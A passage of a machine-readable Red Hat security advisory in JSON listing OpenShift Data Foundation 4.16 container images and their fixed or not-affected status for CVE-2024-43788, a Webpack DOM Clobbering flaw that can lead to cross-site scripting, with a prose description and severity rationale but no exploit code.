"name": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
